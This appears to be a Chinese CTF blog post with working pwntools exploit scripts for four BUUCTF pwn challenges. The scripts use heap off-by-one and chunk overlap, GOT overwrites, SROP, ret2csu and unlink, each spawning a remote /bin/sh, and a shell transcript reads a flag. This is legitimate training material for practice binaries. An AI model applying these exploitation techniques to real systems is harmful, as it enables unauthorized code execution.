[移动开发] PWN-PRACTICE-BUUCTF-17

开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> 移动开发 -> PWN-PRACTICE-BUUCTF-17 -> 正文阅读

[移动开发]PWN-PRACTICE-BUUCTF-17

作者:second-recommend-box recommend-box

PWN-PRACTICE-BUUCTF-17

hitcontraining_heapcreator

单字节溢出，修改下一个chunk的size，造成chunk overlap，实现任意地址读写
参考：buuctf hitcontraining_heapcreator HITCON Trainging lab13

# -*- coding:UTF-8 -*-
from pwn import *
#io=process("./heapcreator")
io=remote("node4.buuoj.cn",25331)
elf=ELF("./heapcreator")
libc=ELF("./libc-2.23-16-x64.so")

def create(size,content):
	io.sendlineafter("Your choice :","1")
	io.sendlineafter("Size of Heap : ",str(size))
	io.sendlineafter("Content of heap:",content)
def edit(index,content):
	io.sendlineafter("Your choice :","2")
	io.sendlineafter("Index :",str(index))
	io.sendlineafter("Content of heap : ",content)#单字节溢出
def show(index):
	io.sendlineafter("Your choice :","3")
	io.sendlineafter("Index :",str(index))
def delete(index):
	io.sendlineafter("Your choice :","4")
	io.sendlineafter("Index :",str(index))
def exit():
	io.sendlineafter("Your choice :","5")

heaparray=0x00000000006020A0

#gdb.attach(io)
#pause()

create(0x18,"aaaa")
create(0x10,"bbbb")
create(0x10,"cccc")
create(0x10,"/bin/sh\x00")

#pause()

edit(0,"a"*0x18+"\x81")
delete(1)

#pause()

size="\x08".ljust(8,"\x00")
payload="d"*0x40+size+p64(elf.got["free"])
create(0x70,payload)

#pause()

show(2)
io.recvuntil("Content : ")
free_addr=u64(io.recvuntil("\n")[:-1].ljust(8,"\x00"))
print("free_addr:"+hex(free_addr))
libc_base=free_addr-libc.sym["free"]
system=libc_base+libc.sym["system"]
edit(2,p64(system))
delete(3)

#pause()

io.interactive()

wustctf2020_closed

题目所给的elf文件关闭了标准输出(fd=1)和标准错误(fd=2)
利用重定向将标准输出重定向到标准输入(fd=0)

p1umh0@p1umh0:~/ctf/pwn$ nc node4.buuoj.cn 25787
   __  ___    ______   ___    
  /  |/  /__ /_  __/__<  /_ __
 / /|_/ / _ `// / / __/ /\ \ /
/_/  /_/\_,_//_/ /_/ /_//_\_\ 

HaHaHa!
What else can you do???
exec 1>&0
cat flag
flag{b02e836b-f53a-4c9a-8287-b54b93c7c65f}
^C

ciscn_2019_es_7

栈溢出，SROP或者ret2csu均可
SROP exp：

from pwn import *
context.arch='amd64'
context.os='linux'
#io=process('./ciscn_2019_es_7')
io=remote("node4.buuoj.cn",29577)
elf=ELF('./ciscn_2019_es_7')
rax_0xf=0x4004DA
syscall=0x400517
vuln_addr=0x4004ED
payload='a'*0x10+p64(vuln_addr)
io.send(payload)
io.recv(0x20)
stack_addr=u64(io.recv(6).ljust(8,'\x00'))
print(stack_addr)
binsh_addr=stack_addr-0x118
sigframe = SigreturnFrame()
sigframe.rax = constants.SYS_execve
sigframe.rdi = binsh_addr
sigframe.rsi = 0x0
sigframe.rdx = 0x0
sigframe.rsp = stack_addr
sigframe.rip = syscall
payload='/bin/sh\x00'
payload=payload.ljust(0x10,'a')
payload+=p64(rax_0xf)+p64(syscall)+str(sigframe)
io.send(payload)
io.interactive()

ret2csu exp：

from pwn import *
#io=process('./ciscn_2019_es_7')
io=remote("node4.buuoj.cn",29577)
execve_addr=0x4004E2
syscall = 0x400517
part1=0x40059A
part2=0x400580
pop_rdi_ret = 0x00000000004005a3
vuln_addr=0x4004ED
payload='a'*0x10+p64(vuln_addr)
io.sendline(payload)
io.recv(0x20)
stack=u64(io.recv(8))
binsh_addr=stack-0x118
execve_stack=stack-0x110
payload='/bin/sh\x00'+p64(execve_addr)
def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):
	payload  = p64(part1)			# part1 entry pop_rbx_rbp_r12_r13_r14_r15_ret
	payload += p64(0x0)			# rbx must be 0x0
	payload += p64(0x1)			# rbp must be 0x1
	payload += p64(jmp2)			# r12 jump to
	payload += p64(arg3)			# r13  -> rdx    arg3
	payload += p64(arg2)			# r14  -> rsi    arg2
	payload += p64(arg1)			# r15d -> edi    arg1
	payload += p64(part2)			# part2 entry will call [r12+rbx*0x8]
	payload += 'A' * 56			# junk 6*8+8=56
	return payload
payload+=com_gadget(part1,part2,execve_stack,0,0,0)
payload+=p64(pop_rdi_ret)+p64(binsh_addr)+p64(syscall)
io.sendline(payload)
io.interactive()

hitcon2014_stkof

利用small bin 的 unlink实现任意地址读写，参考：前端 Unlink笔记&2014 HITCON stkof题解

# -*- coding:utf-8 -*-
from pwn import *
#context.log_level="debug"
#io=process("./stkof")
io=remote("node4.buuoj.cn",29090)
elf=ELF("./stkof")
libc=ELF("./libc-2.23-16-x64.so")
free_got=elf.got["free"]
puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
atoi_got=elf.got["atoi"]

def create(size):
	io.sendline("1")
	io.sendline(str(size))
	io.recvuntil("OK\n")
def fill(index,size,content):
	io.sendline("2")
	io.sendline(str(index))
	io.sendline(str(size))
	io.send(content)
	#io.recvuntil("OK\n")
def free(index):
	io.sendline("3")
	io.sendline(str(index))
	#io.recvuntil("OK\n")
def show(index):
	io.sendline("4")
	io.sendline(str(index))
	io.recvuntil("OK\n")

#gdb.attach(io)
#pause()

s=0x0000000000602140
create(0x100)#chunk1
create(0x30)#chunk2
create(0x80)#chunk3
FD=s+16-0x18
BK=s+16-0x10
payload=p64(0)+p64(0x30)+p64(FD)+p64(BK)
payload=payload.ljust(0x30,"A")
payload+=p64(0x30)+p64(0x90)
fill(2,len(payload),payload)

#pause()

free(3)

#pause()

payload="a"*0x10+p64(free_got)+p64(puts_got)+p64(atoi_got)
fill(2,len(payload),payload)
fill(1,len(p64(puts_plt)),p64(puts_plt))

#pause()

free(2)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym["puts"]
system=libc_base+libc.sym["system"]
fill(3,len(p64(system)),p64(system))
io.sendline("/bin/sh\x00")
#pause()

io.interactive()